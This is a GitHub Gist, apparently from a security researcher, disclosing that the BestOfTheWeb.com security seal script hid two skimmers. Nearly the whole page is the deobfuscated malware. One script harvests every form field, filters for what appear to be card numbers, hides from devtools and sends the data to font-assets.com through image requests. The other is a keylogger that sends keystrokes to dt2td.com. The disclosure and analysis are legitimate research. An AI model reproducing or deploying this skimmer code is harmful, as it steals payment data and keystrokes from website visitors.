Last active
March 2, 2022 17:32
-
-
Save gwillem/4403a9caf6877d6276cf6fe834a0b48a to your computer and use it in GitHub Desktop.
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var sniffData = {}; | |
sniffData['Gate'] = 'https://font-assets.com/img'; | |
sniffData['Data'] = {}; | |
sniffData['Sent'] = []; | |
sniffData.IsValid = ![]; | |
sniffData.SaveParam = function(field) { | |
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) { | |
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![]; | |
sniffData.Data[field.id] = field.value; | |
return; | |
} | |
if (field.name !== undefined && field.name != '' && field.name !== null && field.value.length < 0x100 && field.value.length > 0x0) { | |
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![]; | |
sniffData.Data[field.name] = field.value; | |
return; | |
} | |
}; | |
sniffData.SaveAllFields = function() { | |
var inputfields = document.getElementsByTagName('input'); | |
var selectfields = document.getElementsByTagName('select'); | |
var textareas = document.getElementsByTagName('textarea'); | |
for (var i = 0; i < inputfields.length; i++) sniffData.SaveParam(inputfields[i]); | |
for (var i = 0; i < selectfields.length; i++) sniffData.SaveParam(selectfields[i]); | |
for (var i = 0; i < textareas.length; i++) sniffData.SaveParam(textareas[i]); | |
}; | |
sniffData['SendData'] = function() { | |
if (!window.devtools.isOpen && sniffData.IsValid) { | |
sniffData.Data.Domain = location.hostname; | |
var _0x43c1ef = encodeURIComponent(window.btoa(JSON.stringify(sniffData.Data))); | |
var _0x2c70f7 = _0x43c1ef.hashCode(); | |
for (var _0x3cbd0c = 0x0; _0x3cbd0c < sniffData.Sent.length; _0x3cbd0c++) | |
if (sniffData.Sent[_0x3cbd0c] == _0x2c70f7) return; | |
sniffData.LoadImage(_0x43c1ef); | |
} | |
}; | |
sniffData.TrySend = function() { | |
sniffData.SaveAllFields(); | |
sniffData.SendData(); | |
}; | |
sniffData.LoadImage = function(_0x3e43b7) { | |
sniffData.Sent.push(_0x3e43b7.hashCode()); | |
var _0x2d7e85 = document.createElement('IMG'); | |
_0x2d7e85.src = sniffData.GetImageUrl(_0x3e43b7); | |
}; | |
sniffData.GetImageUrl = function(_0x51c1cf) { | |
return sniffData.Gate + '?reff=' + _0x51c1cf; | |
}; | |
document.onreadystatechange = function() { | |
if (document.readyState === 'complete') { | |
window.setInterval(sniffData.TrySend, 0x1f4); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// (c) Decoded by Sanguine Security | |
var keystrokes = ''; | |
var sniffURL = 'https://dt2td.com/jsk/imgtrack.php?c='; | |
document.onkeypress = function (keypress) { | |
get = window.event ? event : keypress; | |
key = get.keyCode ? get.keyCode : get.charCode; | |
key = String.fromCharCode(key); | |
keystrokes += key; | |
}; | |
window['setInterval'](function () { | |
if (keystrokes.length > 0) { | |
new Image()['src'] = sniffURL + keystrokes; | |
keystrokes = ''; | |
} | |
}) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment